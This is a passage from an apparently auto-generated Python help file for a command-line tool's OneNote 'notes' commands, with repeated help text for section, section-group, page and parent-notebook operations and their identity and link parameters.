short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in groups" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for groups" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for groups" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: 